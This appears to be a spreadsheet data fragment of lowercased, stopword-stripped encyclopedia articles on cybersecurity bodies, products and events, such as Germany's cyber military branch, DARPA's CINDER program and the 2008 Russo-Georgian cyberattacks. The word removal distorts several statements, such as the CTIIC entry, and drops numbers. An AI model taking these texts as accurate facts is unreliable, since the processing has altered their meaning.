    <t>cyber information domain service (german: cyber- informationsraum, german pronunciation: [ˈsaɪ̯bɐ ɪnfɔʁmaˈt͡si̯oːnsˌʁaʊ̯m]; cir) youngest branch germany's military, bundeswehr. decision form military branch presented defense minister ursula leyen april 2016, becoming operational april 2017. headquarter cyber information domain service bonn. history november 2015 german ministry defense activated staff group within ministry tasked developing plans reorganization cyber, military intelligence, geo-information, operative communication units bundeswehr. april 2016 defense minister ursula leyen presented plans military branch public october 2016 command's staff became operational department within ministry defense. april 2017 cyber information domain service activated branch bundeswehr. cyber information domain service headquarters take command existing cyber, military intelligence, geoinformation, operative communication units. command planned fully operational 2021. organisation cids commanded chief cyber information domain service (inspekteur cyber- informationsraum) (inspcir), three-star general position, based bonn. chief cids commander cids deputy commander cids chief staff command staff operations staff planning staff cyber information domain service command (kommando cyber- informationsraum kdocir), bonn strategic reconnaissance command (kommando strategische aufklärung ksa), gelsdorf 911th electronic warfare battalion 912th electronic warfare battalion, mans oste-class sigint/elint reconnaissance ships 931st electronic warfare battalion 932nd electronic warfare battalion, provides airborne troops operations enemy territory bundeswehr strategic reconnaissance school bundeswehr operational communications center cyber-operations center electronic warfare analysis center central imaging reconnaissance, operating sar-lupe satellites central bundeswehr investigation authority technical reconnaissance bundeswehr geoinformation centre (zentrum geoinformationswesen bundeswehr), euskirchen information technology command (kommando informationstechnik bundeswehr), bonn bundeswehr operations center bundeswehr information technology school 281st information technology battalion 282nd information technology battalion 292nd information technology battalion 293rd information technology battalion 381st information technology battalion 383rd information technology battalion bundeswehr cyber-security center bundeswehr software competence center also list cyber warfare forces references external links cyber security, german dossier cyber security bundeswehr white paper german security policy future bundeswehr faculty joint operations</t>
  </si>
  <si>
    <t>Cyber Threat Intelligence Integration Center</t>
  </si>
  <si>
    <t>cyber threat intelligence integration center (ctiic) united states federal government agency fusion center existing agencies private sector real-time cyber attacks. ctiic created blocked efforts congress stymied liability privacy concerns citizens.ctiic formally announced lisa monaco february 2015 wilson center. agency within office director national intelligence. list directors cyber threat intelligence integration center tonya ugoretz (january 2016 march 2019) erin (march 2019 present) also cyber intelligence sharing protection cyber threat intelligence department homeland security intelligence reform terrorism prevention references</t>
  </si>
  <si>
    <t>Trend Micro Internet Security</t>
  </si>
  <si>
    <t>trend micro internet security (known pc-cillin internet security australia virus buster japan) antivirus online security program developed trend micro consumer market. according comparative analysis software products market 2014, trend micro internet security fastest responding internet threats.in addition anti-malware threat protection, premium version software includes compatibility pcs, macs, android mobile devices; parental controls; identity theft prevention; privacy scanner major social networking sites; cloud storage. features features trend micro internet security 2015 include: antivirus antispyware antispam email safety scan two-way firewall website authentication home network protection parental controls filteringthe software also includes: protection rootkits proactive intrusion blocking personal data leak preventiontrend micro premium security includes additional features, including: wireless network validation keylogger protection online data backup remote file folder permissions control tuning cleanup security programs mobile devices android, symbian, windows mobile operating systems cloud storage effectiveness av-comparatives awarded trend micro three-star advanced rating–the highest ranking given organization–in av-comparatives’ whole product dynamic “real-world” protection test 2014.av-test october 2014 gave trend micro internet security 2015 score possible points.trend micro maximum security scored highest success rate blocking malware downloads labs’ 2014 consumer endpoint protection test focused socially engineered malware. results based continuous series tests determine participants’ effectiveness socially engineered malware. labs independent network testing facility, security consultancy organization. labs also found trend micro quickest time adding protection unknown threats less minutes.in january 2016 discovered consumer version trend micro allowed website visited users execute arbitrary code read browser passwords windows purportedly protected. patch later issued close issue. mobile security june 2014, av-test published results mobile security endurance tests, assessed apps six-month period. trend micro's mobile security tied highest overall score points. version history previous versions include: pc-cillin pc-cillin pc-cillin pc-cillin 2000 pc-cillin 2002 pc-cillin 2003 pc-cillin internet security v11/2004 pc-cillin internet security v12/2005 pc-cillin internet security v14/2006 trend micro internet security v15/2007 trend micro internet security v16/2008 trend micro internet security v17/2009 trend micro internet security v18/2010 trend micro titanium internet security v19/2011 trend micro titanium internet security v20/2012 trend micro titanium internet security v21/2013 trend micro titanium internet security v22/2014 trend micro internet security v23/2015as january 2015, trend micro supported trend micro internet security versions 19/2011 higher.pc-cillin 2000 earlier versions virus scanners without additional features. pc-cillin 2002 2003 stand-alone virus scanners also included firewall component improved software's scanning virus detection engine. newer versions trend micro internet security offer additional features spyware protection, antispam integrated firewall along improved scanning virus detection engine enhanced heuristics. pc-cillin 2003 last stand-alone antivirus product offered trend micro 2007, company released standalone anti-malware product offered protection malicious software including viruses, spyware, adware. also antivirus software internet security comparison antivirus software comparison computer viruses references external links trend micro homepage read trend micro homepage</t>
  </si>
  <si>
    <t>Cryptol</t>
  </si>
  <si>
    <t>cryptol domain specific programming language cryptography developed portland, oregon based software development firm, galois, inc. language originally developed united states national security agency. language also used private firms provide information technology systems, american company rockwell collins provides aerospace defense contractors united states.the programming language used aspects developing using cryptography, design implementation ciphers verification existing cryptographic algorithms. cryptol designed allow cryptographer watch stream processing functions program manipulate ciphers encryption algorithms. external links cryptol main page references</t>
  </si>
  <si>
    <t>Cue Health</t>
  </si>
  <si>
    <t>health publicly-traded diego, california-based healthcare technology company develops portable diagnostic tests at-home use. company developed first fda-authorized covid-19 diagnostic test at-home over-the-counter without prescription physician supervision. history health founded cue, inc. diego 2010, ayub khattak clint sever. khattak became company's ceo, sever became chief product officer.in november 2014, company raised $7.5 million series round sherpaventures immortalana. early investors included actor leonardo dicaprio, salesforce marc benioff, political strategist messina.in june 2018, health agency biomedical advanced research development authority (barda), part united states department health human services (hhs) awarded million company, named health, develop inexpensive rapid molecular influenza test. july, company closed million series round.in june 2020, granted emergency authorization (eua) health point-of-care covid-19 test. also june, company closed $100 million series funding round, participation decheng capital, foresite capital, madrone capital partners, johnson johnson innovation, acme capital others. october, department defense awarded health $481 million contract scale-up manufacturing distribute million covid-19 molecular tests across u.s. states, including alaska, florida texas. program assisted fishing industry workers unalaska, alaska, could easily socially distance, access laboratory testing services. november, national basketball association (nba) announced used cue's covid-19 test safely operate bubble orlando 2019-20 season.in march 2021, granted health at-home, non-prescription, over-the-counter molecular covid-19 test. april, company announced schools program provide k-12 schools universities covid-19 test. september, company went public symbol "hlth" nasdaq valuation $2.3 billion. october, company announced would serving nba's official home point care covid-19 testing provider 2021–22 season, marking third straight year partnership league. november, company began selling test directly consumers. december, american news magazine newsweek named health's home covid test favorite products month.in january 2022, google's parent alphabet announced offering cue's home tests employees. also reported google's cloud division partnered health develop real-time covid-19 variant tracking sequencing, giving google access testing variant data. also january, fast company reported health reader google's popular employee perks. products health develops molecular testing devices. company's covid-19 tests amplify detect genomic sars-cov-2, virus causes covid-19. testing system consists swab cartridge reads user's specimen, application produces results.the also provides access mobile health dashboard connect on-demand telemedicine, proctoring, prescription services.the company also develops software platform health providers manage patient test results follow-up care.as 2018, company also reportedly developing professional-use multiplex test detect different respiratory pathogens. operations health's headquarters manufacturing facilities based diego. september 2021, company reported 1,250 employees. references external links official website</t>
  </si>
  <si>
    <t>Transmit Security</t>
  </si>
  <si>
    <t>transmit security private cybersecurity identity access management company based aviv, israel boston, massachusetts. founded mickey boodaei rakesh loonkar 2014, transmit security provides companies customer authentication, identity orchestration, workforce identity management services. june 2021, company completed series funding round raising $543 million, reported largest series cybersecurity history. transmit security fido alliance board member. history transmit security co-founded 2014 mickey boodaei rakesh loonkar. boodaei loonkar previously founded trusteer 2006, acquired 2013 billion.in november 2020, transmit security ranked deloitte's "north america technology fast 500", list fastest-growing tech companies north america.in february 2021, transmit security joined fido alliance board.in june 2021, transmit security completed series funding round raising $543 million investors. reported largest series cybersecurity history. primary investors included insight partners general atlantic, additional investment cyberstarts, geodesic, ventures, vintage artisanal ventures. september 2021, citi ventures goldman sachs asset management joined investors. operations transmit security’s main headquarters located aviv, israel. north american headquarters boston, massachusetts. additional offices located london, berlin, tokyo, hong kong, madrid, paulo, mexico city. also secret double octopus list unicorn startup companies references</t>
  </si>
  <si>
    <t>Restricted-access barrier system</t>
  </si>
  <si>
    <t>restricted-access barrier system (rabs) installation used many industries, pharmaceutical, medical, chemical, electrical engineering controlled atmosphere needed. rabs provides physical barrier workers production areas. also clean room references</t>
  </si>
  <si>
    <t>Customer identity access management</t>
  </si>
  <si>
    <t>customer consumer) identity access management (ciam) subset larger concept identity access management (iam) focuses managing controlling external parties' access business' applications, portals digital services.the biggest difference typical ciam ciam gives users (consumers) significantly control identity. unlike traditional inside-out) iam, generally driven operational efficiency, ciam built user-first, outside-in approach gives customers agency make changes security, privacy personalization settings. basic level, ciam system establishing maintaining persistent customer data, authenticating legitimate users, denying access threat actors authorizing customers access digital assets. while vast number additional functions ciam solutions provide, secondary external-facing authentication authorization. ciam functionality ciam composed wide array tools applications, often combining software multiple vendors achieve desired functionality. reason, businesses often take phased approach ciam implementing technologies suit immediate needs rather attempting roll comprehensive solution.rather defined specific tools, ciam accurately described based capabilities. generally speaking, ciam environment includes: identity administration user privacy consent management fraud prevention capabilitiesciam solutions also include limited secured apis, sdks mobile apps, single sign-on (sso), social logins (byoi) fraud detection behavior monitoring. ciam environments designed scale beyond typical scenarios internal iam, millions concurrent users. ciam environments also work adjunctively customer relationship management (crm) system provide personalized content manage user behavior. digital identities managed ciam solution used give access different business applications, portals webshops. fact transactions logged, data used profiling purposes. transaction data correlated digital identities customers, data seen relevant component systems. ciam cybersecurity ciam environments protect owners different cyber threats traditional solutions. financially motivated threat actors attacking ciam solution steal services make illegitimate purchases rather ransom business infrastructure.ciam solutions tasked protecting customer accounts without significantly compromising smooth convenient experience. they benefit dealing internal users like employees, thus ciam environments typically designed contain self-service components account maintenance troubleshooting. example, ciam customer might able easily reset account's password automated dialogues. however, self-service mechanisms becoming frequent targets fraud schemes. because this, many ciam implementations designed authorize users based perceived level trust, enforcing secondary step-up authentication user tries take particularly sensitive action. privacy consent management because nature ciam involves user logging managing profile accessing services ciam solutions collect personally identifiable information. privacy laws, gdpr european union, hold ciam providers accountable processing kind data, hence providers taken steps restrict processing data implementing consent management services. every data element, users define whether provider process transfer personal data. instance, user give revoke consent process transaction data marketing purposes. ciam market vendors primarily identify products services ciam components appeal potential clients. ciam still relatively market apart iam, providers offer comprehensive solutions, include proposed functions ciam implementation. analysts still divided terminology includes, generally accepted ciam represents external user-centric alternative legacy iam. also digital identity electronic authentication federated identity identity assurance identity management privacy design strong authentication references</t>
  </si>
  <si>
    <t>CySA+</t>
  </si>
  <si>
    <t>NSA product types</t>
  </si>
  <si>
    <t>Cyber Civil Rights Initiative</t>
  </si>
  <si>
    <t>cyber civil rights initiative (ccri) non-profit organization founded holly jacobs 2012. organization offers services victims cybercrimes crisis helpline. they compiled resources help victims cybercrimes america internationally. ccri's resources include list frequently asked questions, online image removal guide, roster attorneys able offer low-cost pro-bono legal assistance, list laws related nonconsensual pornography related issues. ccri publishes reports nonconsensual pornography, engages advocacy work, contributes updating tech policy. ccri offers expert advice tech industry leaders twitter, facebook, google regarding policies nonconsensual pornography. ccri lead educator united states subject matter related nonconsensual pornography, recorded sexual assault, sextortion. leadership holly jacobs founder board member. previously, served ccri's president executive director. mary anne franks ccri's president, legislative tech policy director. franks professor university miami school expert first amendment law, second amendment law, privacy, cyberlaw, criminal procedure. franks drafted first model criminal statute nonconsensual pornography, used template many states well pending federal legislation. franks also author cult constitution: deadly devotion guns free speech (stanford press, 2019). danielle citron ccri's vice president secretary. prof. citron teaches university virginia school law. expert information privacy, free expression, civil rights law. 2019, prof. citron named arthur fellow work sexual privacy cyberstalking. author hate crimes cyberspace (harvard university press). prof. citron franks co-authored piece titled criminalizing revenge porn wake forest review first review article take topic challenges.ccri's board members also include hany farid professor university california, berkeley joint appointment electrical engineering computer science school information. farid brings ccri expertise misinformation digital forensics.dr. safiya noble also member ccri's board, brings organization expertise design digital media impact society focus racist, gendered, biased algorithms. safiya author algorithms oppression: search engines reinforce racism. safiya also recipient hellman fellowship ucla early career award. ezra waldman professor computer science northeastern university school law, also serves ccri's board. prof. waldman's work focuses asymmetrical power relations rooted technology. expertise focuses privacy, online harassment, free speech lgbtq community. prof. waldman author privacy trust: information privacy information (cambridge university press, 2018) inside information industry (cambridge university press, forthcoming 2021). 2020, prof. waldman also named 2020's fifty thinkers prospect magazine work privacy digital age, technology sociology. references external links official website</t>
  </si>
  <si>
    <t>Cyber Discovery</t>
  </si>
  <si>
    <t>cyber discovery united kingdom initiative teenagers interested cyber security. initiative funded million department digital, culture, media sport partnership sans institute started 2017, year program followed similar pattern (often overlapping) stages. cyberstart assess each year program started assess phase. contained capture-the-flag style challenges, students performed well invited progress game essentials. cyberstart game game contained challenges, separated groups, known 'bases'. challenges similar format ones assess, much broader scope increased difficulty. student progressed levels, challenges became much difficult. 'field manual' provided contained instructions certain cybersecurity tools techniques. challenges completed finding flag, awarded student points equal times level challenge. possible challenges request hint, reduced points gained challenge half. headquarters largest base challenges split levels increasing difficulty, headquarters covered wide variety challenges including open-source intelligence, cryptography, binary exploitation. moon exclusively taught programming python focus using exploit files services. moon base consisted eight levels, five challenges. first three levels focused tutorials, following five levels containing challenges test student's coding ability. forensics added year forensics base focused steganography retrieving information provided files packet captures, disk images memory captures. this base consisted levels challenges each. volcano added year volcano base provided pen-testing challenges could unlocked completing 100% headquarters. base levels, challenges. unlike bases, challenges individually sequentially unlocked, making impossible skip one. when student unlocked volcano access, challenges completed within virtual machine hosted cyber start platform using vnc, instances spun demand everything necessary complete challenge. virtual machine used entire level access granted hour slots. this system useful students working programme school virtual machines tools required often forbidden. cyberstart essentials accessible students qualified game, essentials non-competitive learning environment containing video text tutorials, quizzes exams. designed complement game, usually open much time. 2020, essentials updated sans foundations course. cyberstart elite small selection best-performing students preceding stages invited elite events, face-to-face residential camps. year students attended different events manchester, bristol london summer 2018. events lasted days included talks industry professionals, challenges, capture flag competition. year events took place birmingham, lancaster london summer 2019. older group (16-18 year olds) participated courses sans institute; either sec504 for500, younger group completed course called ethical hacking fundamentals. year covid-19 pandemic, year elite took place online. older students (16-18s) offered choice for500, sec504, sec503, delivered sans live online. year october 2020, mentions elite pulled initiative's website. however, students selected "based combination performance criteria across cyber discovery" take part cyber discovery summer event 2021. this delivered virtually june june, consisted talks industry experts capture flag competition. content creators club content creators club cyber discovery initiative, separate four rounds. students submitted capture flag challenge ideas, picked developed first creators competition. students made walkthroughs sans james lyne, released vimeo. references</t>
  </si>
  <si>
    <t>Cyber Insider Threat</t>
  </si>
  <si>
    <t>cyber insider threat, cinder, digital threat method. 2010, darpa initiated program name (cyber insider threat (cinder) program) develop novel approaches detection activities within military-interest networks consistent activities cyber espionage.the cinder threat unlike vulnerability based attacks action taken initiator based unauthorized access unauthorized objects authorized objects, based concept authorized access authorized objects normally occur (along subsequent actions) within security boundary. this object action viewed attack, normal analyzed standard ids-ips, logging expert systems. cinder mission seen unauthorized disclosure data exfiltration realized. time, resultant cinder case would change object actions related disclosure "authorized authorized object" "unauthorized authorized object".note: initial cinder case, controlling agent still seen authorized object based fact security system passed evaluation assurance functionality. cyber insider threat continued known issue since mid-1980s. following nist material dated march 1994, "internal threats", shows defined infancy. "system controls well matched average organization's security policy. direct result, typical user permitted circumvent policy frequent basis. administrator unable enforce policy weak access controls, cannot detect violation policy weak audit mechanisms. even audit mechanisms place, daunting volume data produced makes unlikely administrator detect policy violations. ongoing research integrity intrusion detection promise fill gap. until research projects become available products, systems remain vulnerable internal threats." cinder behaviors methods cinder prerequisites there many prerequisite dimensions cinder activity, primary dimension must always met. that system ownership. prerequisite principles system ownership information dominance within area object action must part cinder mission. cinder system ownership object action cinder action, mission dimension resulting case issue distilled entity, agent. action. specific time agent completes action, entity, agent action owns environment transiting using. successful committing specific transaction interrupted least measured monitored owner, entity have, moment time, dominance ownership object. cinder detection methods methods detecting past cinder actions detect past cinder activity exposure realized, must reconcile object actions (any exchange transaction agents measured logged) analyze result. methods detecting current future cinder actions present concepts detects current future cinder activity followed path detecting past cinder activity: reconciliation data object action, application heuristics, expert system logic mining models data aggregated. building automated logic analysis models proved difficult since again, insider attack (authorized access authorized objects). breaking "use" "how use" system assurance percentage reconciliation always cause system produce many false positives method acceptable true cinder security solution. main tenet cinder detection become system high assurance high reconciliation controlled (owned) extent current future cinder actions identified, monitored terminated. ongoing projects detect cinder action defense advanced research projects agency darpa darpa ongoing cyber insider threat cinder program detect insider threats computer systems. darpa's strategic technology office (sto). project timed begin around 2010/2011. comparison traditional computer security, cinder assumes malicious insiders already access internal network; thus attempts detect threat's "mission" analysis behavior rather seeking keep threat out. government documentation uses analogy "tell" idea card game poker.according ackerman wired, impetus program came wikileaks disclosures afghan documents leak. robert gates' philosophy information military emphasize access frontline soldiers. face mass-leaking, cinder type response allows military continue philosophy, rather simply cutting access information masse. project started peiter zatko, former member l0pht left darpa 2013. also echelon, thinthread, trailblazer, turbulence, prism (surveillance program) (nsa programs) einstein (us-cert program) fusion center, investigative data warehouse (fbi) prodigal, adams (darpa) references</t>
  </si>
  <si>
    <t>Cyber Intelligence House</t>
  </si>
  <si>
    <t>cyber intelligence house, formerly kinkayo, singapore-based cyber intelligence agency, specializes cyber exposure. company detects monitors cyber exposure dark web, deep web, data breaches alert individuals businesses potential cyber threats. cyber exposure index cyber exposure index (cei), company's research-driven project, world's first proprietary global scoring system calculates exposure index listed companies based exposed credentials, hacker-group activity leaked sensitive information. sort cyber risk score given public companies listed stock exchanges hosted countries (australia, finland, germany, hong kong, indonesia, italy, south africa, usa, malaysia singapore). scores 6,000 listed companies levels exposure, analysing data collected company publicly available sources dark deep web, published data breaches. companies evaluated given score ranging 300+, indicating exposure past months 300+ indicating company represent exposed companies globally. index first launched october 2017; results concluded publicly listed companies australia, hong kong singapore least exposed cyber threats. october 2018, results updated singapore, malaysia indonesia earmarked least exposed countries world. this also speculation cyber threat exposure location centric. asia pacific firms tend lower exposure american counterparts. faced negative press south africa, ranked exposed country october 2017. south african banking risk information centre (sabric) speculated research findings cause unnecessary fear, uncertainty doubt. hacked hacked cyber exposure monitoring individuals, launched june 2018. android application alert people, whenever sensitive information compromised. provides free e-mail account monitoring. however, premium plan subscription, users monitor credit cards, usernames, numbers, physical addresses well. references external links official website outsourcing provider</t>
  </si>
  <si>
    <t>Cyber Ireland</t>
  </si>
  <si>
    <t>cyber ireland business cluster organisation connects businesses, educational institutions state support growing cyber security industry ireland, consisted domestic multinational cyber-security companies 2018. launched 2019 enterprise ireland's regional technology cluster fund, cyber ireland members start 2022 including johnson controls international, dell emc, ibm, mcafee, mckesson trend micro. cyber ireland first business cluster formed country. purpose structure cyber security sector ireland five world's leading software security companies located there, however acknowledged skills industry around irish companies open unfilled cyber security positions. facilitated cork institute technology, cyber ireland works academia ensure consistent supply trained cyber security talent feed industry. three regional working groups exist south, north west western areas, well special interest groups, threat intelligence operational security. well addressing skills shortage, cyber ireland provides collective voice sector companies 2021 conti ransomware attack malware attack systems irish health service executive shut systems across hospitals ireland causing major long-lasting disruption health service. this largest cyber attack ireland largest healthcare system worldwide. result, security became focus businesses outside cyber security industry, placing additional pressure supply skills. response, cyber ireland together third-level education providers including sligo increased cyber security content existing courses. references</t>
  </si>
  <si>
    <t>Cyber Resilience Review</t>
  </si>
  <si>
    <t>cyber resilience review (crr) assessment method developed united states department homeland security (dhs). voluntary examination operational resilience cyber security practices offered cost operators critical infrastructure state, local, tribal, territorial governments. service-oriented approach, meaning foundational principles organization deploys assets (people, information, technology, facilities) support specific operational missions services). offered facilitated workshop format self-assessment package. workshop version facilitator critical infrastructure facility. workshop typically takes hours complete draws cross section personnel critical infrastructure organization. information collected facilitated protected disclosure protected critical infrastructure information 2002. this information cannot disclosed freedom information request, used civil litigation, used regulatory purposes. self-assessment package allows organization conduct assessment without need direct assistance. available download critical infrastructure cyber community voluntary program website. package includes automated data answer capture report generation tool, facilitation guide, comprehensive explanation question, crosswalk practices criteria national institute standards technology (nist) cybersecurity framework. questions asked resulting report versions assessment. partnered cert division software engineering institute carnegie mellon university design deploy crr. goals practices found assessment derived cert resilience management model (cert-rmm) version 1.0. introduced 2009 received significant revision 2014. architecture comprises goals specific practices extracted cert-rmm organized domains): asset management controls management configuration change management vulnerability management incident management service continuity management risk management external dependency management training awareness situational awarenesseach domain composed purpose statement, specific goals associated practice questions unique domain, standard maturity indicator level (mil) questions. questions examine institutionalization practices within organization. performance organization scored scale. this scale depicts capability divided five levels: mil1-incomplete, mil2-performed, mil3-managed, mil4-measured, mil5-defined. institutionalization means cybersecurity practices become deeper, lasting part organization managed supported meaningful ways. when cybersecurity practices become institutionalized—or “embedded”—managers confidence practices’ predictability reliability. practices also become likely sustained times disruption stress organization. maturity also lead tighter alignment cybersecurity activities organization’s business drivers. example, mature organizations, managers provide oversight particular domain evaluate effectiveness security activities domain comprises. number goals practice questions varies domain, questions concepts encompass domains. questions three possible responses: “yes,” “no,” “incomplete. measures performance organization practice, goal, domain, levels. scores calculated individual model elements aggregated totals. scoring rubric establishes following: practices observed three states: performed, incomplete, performed. domain goal achieved practices related goal achieved. domain fully achieved goals domain achieved.if conditions met, organization said achieving domain performed state: practices define domain observable, determination made degree practices repeatable varying conditions consistently applied able produce predictable acceptable outcomes retained times stressthese conditions tested applying common questions domain, mil1 achieved. consistent architecture scale, mils cumulative; achieve specific domain, organization must perform practices level preceding mils. example, organization must perform domain practices mil1 mil2 achieve mil2 domain. results participants receive comprehensive report containing results question domains. report also provides graphical summaries organization’s performance goal domain levels, depicted heat-map matrix. this detailed representation allows organizations target improvement fine-grained level. organizations participating facilitated crrs receives additional graphs depicting performance organization compared prior participants. report includes potential path toward improving performance practice. these options consideration primarily sourced cert-rmm nist special publications. organizations also results measure perform relation criteria nist cybersecurity framework. this correlation feature introduced february 2014. also critical infrastructure protection nist cybersecurity framework cyber resilience references external links cyber resilience review cert resilience management model</t>
  </si>
  <si>
    <t>Cyber Security Agency (Singapore)</t>
  </si>
  <si>
    <t>cyber security agency (csa) government agency prime minister's office, managed ministry communications information government singapore. provides centralised oversight national cyber security functions, works sector leads protect singapore's critical information infrastructure (cii), energy banking sectors. formed april 2015, agency also engages various industries stakeholders heighten cyber security awareness well ensure development singapore's cyber security. headed commissioner cybersecurity, david koh. minister-in-charge josephine teo. history overview cyber security agency took functions previously carried singapore infocomm technology security authority (sitsa), ministry home affairs. sitsa 2009 national specialist authority overseeing operational security. also took roles undertaken then-infocomm development authority (ida) singapore computer emergency response team (singcert), facilitates detection, resolution prevention security-related incidents internet. agency builds upon government's cyber security capabilities, include strategy policy development, cyber security operations, industry development outreach; well public communications engagement. organised events singapore international cyber week (sicw) 2016, 5,000 attendees close countries. sicw also launch singapore's cybersecurity strategy. 2017, second edition sicw held september 2017. also hosted asean ministerial conference cybersecurity. singapore's cybersecurity strategy october 2016, then-prime minister hsien loong launched singapore's cybersecurity strategy create resilient trusted cyber environment singapore. four pillars underpinned strategy: building resilient infrastructure creating safer cyberspace developing vibrant cybersecurity ecosystem strengthening international partnershipssingapore's revised goals outlined singapore cybersecurity strategy 2021. result, singapore's cybersecurity plan, originally implemented 2016, reviewed updated. cutting internet access 2016, part singapore's cybersecurity strategy, announced internet access civil servants' work station cut-off. david koh, chief executive then-newly formed agency, said officials realised much data secure "there secure attack surface like building zillion windows, doors, fire escapes".security experts commented move raise defense cyber attack slightly risk damaging productivity civil servants working four dozen statutory boards, cutting people serve. singapore's cybersecurity programmes singapore cyber security agency launched various programmes support strategy, including: common criteria csat programme cybersecurity labelling scheme cybersecurity career mentoring programme cybersecurity co-innovation development fund ice71 cybersecurity solutions cyber safe seniors cyber safe students cyber talent. these initiatives include: cyber security associates technologists (csat) programme infocomm media development authority (imda); cybersecurity career mentoring programme singapore computer society (scs); cyber women initiative; cyber educators programme; cyber youth programme. cyber safe programme.singapore’s cyber security agency launched cyber security certification scheme recognizing organisations good cyber security practices march, 2022. also national cyber security centre government technology agency (govtech) references external links official website</t>
  </si>
  <si>
    <t>Cyber ShockWave</t>
  </si>
  <si>
    <t>cyber shockwave, similar cyber storm exercise, 4-hour wargame conducted february 2010 bipartisan policy center, american think tank based washington, d.c. former high-ranking cabinet national security officials role played cabinet level response cyberwarfare scenario. portions exercise later broadcast cnn. background cyberwarfare become major threat united states. there current debate whether cyberwarfare constitutes actual rhetorical less threatening concept instead. control internet long issue internet security electronic privacy. cyber shockwave simulation game developed partnership general dynamics advanced information systems, smobile systems, southern company georgetown university. created former director general michael hayden conducted bipartisan policy center give glimpse would happen cyber attack gauged whether united states prepared security agents lawmakers played roles fabricated attacks. participants know scenario advance helped maintain reality surprise attack. real attack happen would come without notice lawmakers government agencies would re-act immediately timely manner.to prepare possible attack, members white house, cabinet members national security agencies plan advise president barack obama possible plans actions. participants roles list attendees included: michael chertoff, former secretary homeland security, national security advisor fran townsend, former white house homeland security advisor, secretary homeland security bennett johnston, former senator (d-la), secretary energy john negroponte, former united states deputy secretary state, secretary state jamie gorelick, former deputy attorney general, attorney general lockhart, former white house press secretary, counselor president, john mclaughlin, former acting director central intelligence, director national intelligence stephen friedman, former director national economic council, secretary treasury stewart baker, national security agency general counsel, cyber coordinator charles wald, former deputy commander u.s. european command, secretary defense simulation attack simulation attacks presented malware program planted phones popular basketball game. this attack caused disruption spanning many mobile phones across united states. spyware planted smartphones used logger data intercepts funnel funds banks overseas. several bots appear downloading videos shows 'the army'. when someone receives spyware, sent person's contact contacts open spreading malicious virus everywhere.in addition, cyber attack reportedly sparked series crises provisions including: million people without power eastern united states more million cellphones service wall street closed week capitol hill leaders route white house results results cyber shockwave game showed united states unprepared cyber attack. results highlighted immediate dangers threatening country. finally, game demonstrates would huge financial repercussions cyber attack.the simulation revealed response speed crucial cyber attack planning deficiency united states exhibited game extremely costly. simulation also showed fast speed attack leaves little time better understand certain things essence attack, provided happen, proper recovery methods. former clinton press secretary lockhart added simulation shockwave cause panic among people, fact good thing.according former secretary homeland security michael chertoff, united states lacks several aspects cyber security: well-defined responsibilities maintaining common situational awareness emerging critical operational developments cyberspace effective decision-making framework cabinet level coordinating government's response recovery devastating cyber event. user-friendly process allow government cyber defenders effectively collaborate private sector take advantage expertise knowledge response cyberattack also cyber storm exercise national strategy secure cyberspace references external links official website</t>
  </si>
  <si>
    <t>Cyber Storm Exercise</t>
  </si>
  <si>
    <t>cyber storm exercise biennial simulated exercise overseen united states department homeland security took place february february 2006 purpose testing nation's defenses digital espionage. simulation targeted primarily american security organizations officials united kingdom, canada, australia zealand participated well. cyber storm first cyber storm exercise took place february february 2006 purpose testing nation's defenses digital espionage. simulation exercise simulated large scale attack critical digital infrastructure communications, transportation, energy production. simulation took place series incidents included: washington, d.c. metro trains mysteriously shutting down. bloggers revealing locations railcars containing hazardous materials. airport control towers philadelphia chicago mysteriously shutting down. mysterious liquid appearing london subway. significant numbers people fly" lists suddenly appearing airports nation. planes flying close white house. water utilities angeles getting compromised. internal difficulties during exercise computers running simulation came attack players themselves. heavily censored files released associated press reveal time exercise organizers sent every involved e-mail marked "important!" telling participants simulation attack game's control computers. performance participants cyber storm exercise highlighted gaps shortcomings nation's cyber defenses. cyber storm exercise report found institutions attack hard time getting bigger picture instead focused single incidents treating "individual discrete". light test department homeland security raised concern relatively modest resources assigned cyber-defense would "overwhelmed real attack". cyber storm cyber storm international cyber security exercise sponsored united states department homeland security 2008. week-long exercise centered washington, concluded march cyber storm cyber storm international cyber security exercise sponsored united states department homeland security 2010. week-long exercise centered washington, concluded october also cyber shockwave references</t>
  </si>
  <si>
    <t>Cyberattacks during the Russo-Georgian War</t>
  </si>
  <si>
    <t>during russo-georgian series cyberattacks swamped disabled websites numerous south ossetian, georgian, russian azerbaijani organisations. attacks initiated three weeks shooting began. attacks july 2008, weeks russian invasion georgia, "zombie" computers already attack georgia. website georgian president mikheil saakashvili targeted, resulting overloading site. traffic directed website included phrase "win+love+in+rusia". site taken hours.on august 2008, websites osinform news agency osradio hacked. osinform website osinform.ru kept header logo, content replaced content alania website. alania georgian government supported television station aimed audiences south ossetia, denied involvement hacking rival news agency website. dmitry medoyev, south ossetian envoy moscow, claimed georgia attempting cover deaths georgian servicemen flare-up august 2.on august, baku–tbilisi–ceyhan pipeline subject terrorist attack near refahiye turkey, responsibility originally taken kurdistan workers' party (pkk) circumstantial evidence instead sophisticated computer attack line's control safety systems increased pressure explosion.according jart armin, researcher, many georgian internet servers external control since late august 2008. august, ddos attacks peaked defacements began.however, within hours traffic diverted moscow-based servers.on august 2008, novosti news agency's website disabled several hours series georgian counter-attacks.by august 2008, website georgian president defaced images comparing president saakashvili adolf hitler posted. this example cyber warfare combined psyops. georgian parliament's site also targeted. some georgian commercial websites also attacked. ministry foreign affairs blog google's blogger service temporary site. georgian president's site moved servers. national bank georgia’s site defaced point 20th-century dictators' images image georgian president saakashvili placed. georgian parliament website defaced "south ossetia hack crew" content replaced images comparing president saakashvili hitler.estonia offered hosting georgian governmental website cyberdefense advisors. reported russians bombed georgia’s telecommunications infrastructure, including cell towers. private united states companies also assisted georgian government protect non-war making information government payroll conflict.russian hackers also attacked servers azerbaijani day.az news agency. reason day.az position covering russian-georgian conflict. ans.az, leading news websites azerbaijan, also attacked. russian intelligence services also disabled information websites georgia war. georgian news site civil georgia switched operations google's blogspot domains. despite cyber-attacks, georgian journalists managed report war. many media professionals citizen journalists blogs report comment war.reporters without borders condemned violations online freedom information since outbreak hostilities georgia russia. "the internet become battleground information first victim," said.the attacks involved denial-of-service attacks.on august 2008, reported although ceasefire reached, major georgian servers still down, hindering communication georgia. analysis russian government denied allegations behind attacks, stating possible "individuals russia elsewhere taken upon start attacks".dancho danchev, bulgarian internet security analyst claimed russian attacks georgian websites used “all success factors total outsourcing bandwidth capacity legal responsibility average internet user.”jose nazario, security researcher arbor networks, told cnet seeing evidence georgia responding cyber attacks, attacking least moscow-based newspaper site.according jackson, director threat intelligence secureworks, lending credence idea russian government indeed behind attack, rather rbn. furthermore, jackson found computers attacking georgian websites servers, also "internet addresses belonging state-owned telecommunications companies 